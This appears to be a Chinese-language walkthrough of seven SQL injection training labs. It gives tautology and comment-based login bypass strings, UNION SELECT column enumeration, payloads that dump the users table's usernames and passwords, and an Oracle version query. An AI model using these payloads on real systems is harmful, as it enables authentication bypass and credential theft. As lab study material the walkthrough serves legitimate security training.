SQL注入

1.该实验室在产品类别过滤器中包含一个SQL注入漏洞。当用户选择类别时，应用程序将执行如下SQL查询：SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1要解决此问题，请执行SQL注入攻击，使应用程序显示任何类别的所有产品的详细信息，包括已发布和未发布。

解题：点进类别，把后缀改为category=‘ or 1=1--(--代表注释后面内容)

2.该实验在登录功能中包含一个SQL注入漏洞。要解决此问题，请执行SQL注入攻击，以administrator用户身份登录到应用程序

解题：由题意，sql语句可能为select * from users where username=" " and password=" "
我们可以通过在输入用户名那一列输入administrator’--，成功登录到管理员用户

3.该实验室在产品类别过滤器中包含一个SQL注入漏洞。查询的结果将在应用程序的响应中返回，因此您可以使用UNION攻击从其他表中检索数据。攻击的第一步是确定查询正在返回的列数。然后，您将在后续实验中使用此技术来构建完整的攻击。要解决此问题，请通过执行SQL注入UNION攻击（返回包含空值的附加行）来确定查询返回的列数。

1）使用union攻击，点击类别后，输入' union select null,null(一直到成功为止) --
2）使用order by,点击类别后，输入' order by 1(2,3成功为止) --

4.该实验室在产品类别过滤器中包含一个SQL注入漏洞。查询的结果将在应用程序的响应中返回，因此您可以使用UNION攻击从其他表中检索数据。要构造这样的攻击，您首先需要确定查询返回的列数。您可以使用在上一个实验室中学到的技术来做到这一点。下一步是确定与字符串数据兼容的列。实验室将提供您需要在查询结果中显示的随机值。要解决此问题，请执行SQL注入UNION攻击，该攻击将返回包含所提供值的另一行。此技术可帮助您确定哪些列与字符串数据兼容。

使用union攻击，点击类别后，输入' union select null,null,null(成功为止) --
确定为三列，然后根据题意，带入文字'd7tr92'，一个个位置测试

5.该实验室在产品类别过滤器中包含一个SQL注入漏洞。查询的结果将在应用程序的响应中返回，因此您可以使用UNION攻击从其他表中检索数据。要构造这样的攻击，您需要结合您在以前的实验中学到的一些技术。该数据库包含另一个名为的表users，其列名为username和password。要解决此问题，请执行SQL注入UNION攻击，以检索所有用户名和密码，并使用该信息以administrator用户身份登录。

1）爆字段
使用union攻击，点击类别后，输入' union select null,null --
2）爆用户和密码
改为' union select username,password from users --
得到
administrator
bmrg6fk7dm1vr6ggh6bk
wiener
fy9e6euzlttdnc3a6uxo
carlos
2qprbkhpwtpqsb03ou1i 
3)登录

6. 该实验室在产品类别过滤器中包含一个SQL注入漏洞。查询的结果将在应用程序的响应中返回，因此您可以使用UNION攻击从其他表中检索数据。该数据库包含另一个名为的表users，其列名为username和password。要解决此问题，请执行SQL注入UNION攻击，以检索所有用户名和密码，并使用该信息以administrator用户身份登录。

1)点击类别，输入' union select '1','2' ,得到回显位2
2）点击类别，输入 ' union select '1',username||'~'||password from users --
得到
wiener~9vj9nvrde29sdzvv41j8
administrator~glvhxp9qy4a2u9s3n4iw
carlos~pxawxawrf7ujrjyz7txt
3)登录

7. 该实验室在产品类别过滤器中包含一个SQL注入漏洞。您可以使用UNION攻击从注入的查询中检索结果。要解决此问题，请显示数据库版本字符串。甲骨文

1)' union select '1','2' from dual--
2)' union select banner,'2' from v$version--